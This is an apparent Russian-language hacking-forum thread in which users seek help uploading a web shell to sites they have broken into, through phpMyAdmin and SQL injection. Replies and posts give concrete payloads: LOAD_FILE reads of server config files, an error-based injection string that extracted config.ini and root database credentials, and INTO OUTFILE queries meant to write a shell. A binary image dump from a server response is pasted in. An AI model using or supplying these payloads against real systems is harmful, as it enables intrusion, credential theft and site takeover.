ANTICHAT — форум по информационной безопасности, OSINT и технологиям

d1v said:
тогда иди на завод. и вообще ты разделом ошибся. не пиши сюда больше.

Aniweste said:
Здравствуйте ещё раз. Интересует следующий вопрос:
Имеется доступ к phpmyadmin.
Права пользователя: ALL PRIVILEGES
Версия phpmyadmin: 3.3.4
Sql-injection на сайте не приводит к раскрытию путей.
Какие есть способы залить шелл?
Спасибо за ответ.

Boolean said:
LOAD_FILE('/путь/до/конфиг/апача');
Список можно посмотреть тут: /thread49775.html

Aniweste said:
Делаю sql-запрос - получаю ответ
Что именно я делаю не правильно?

lion-art said:
Как всегда начну с фразы: "Уважаемые знатоки!"
Есть сайт:
1)file_priv=y
2)mq=off
3) есть /test.php
3) Доступ 4х администраторов в админку есть, доступ в админку www.site.ru/cms) - так он не пускает но если через www.site.ru/index.php/cms тогда пускает но не выполняются скрипты.
4) прочитан config.ini есть пароль root к базе. Но путь до самой базы не известен.
Теперь самое интересное:
config.ini прочитан так:
index/***/id/*21'+or+1+group+by+concat(mid(load_file(0xздес ьхеш),50,163),floor(rand(0)*2))+having+min(0)+ or+1+--+
запрос на запись делаем так: /image/*****/id/*53+and+(select+'+into+outfile+')+!=1
результат - ошибка но через пару часов при
/image/*****/id/*53 без инъекта появляется следущее:
яШяаJFIF

HHяб4ExifII*




b

j(

1
r2
Ћi‡
¤шЂь 'Ђь 'Adobe Photoshop CS2 Windows2011:07:05 16:16:46†’Ъ

яя 
Ж 
zLEAD Technologies Inc. V1.01



F


N
(



V

ЦH
H
яШ� �аJFIF
HHянAdobe_CMяоAdobedЂ
яЫ„   
  яАc 
"

яЭ яД
?







 








 

3
!1AQa"qЃ2‘Ў
и т.д...
ВНИМАНИЕ ВОПРОС!
На сколько высока вероятность то что into outfile не получится (доходчиво: шелл не зальется?)
P.S. возможно не правильный запрос но если запрос сделать так
/image/*****/id/*53+and+'select+'+into+outfile+'+!=1'
то ошибка такова:
Invalid query: File ' !=1' already exists
Спасибо за внимание надеюсь на коментарии, может у кого-то похожая ситуация была.